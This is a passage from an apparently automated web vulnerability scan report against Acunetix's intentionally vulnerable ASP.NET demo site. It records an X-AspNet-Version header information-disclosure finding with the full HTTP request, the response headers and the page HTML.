iBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        26. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
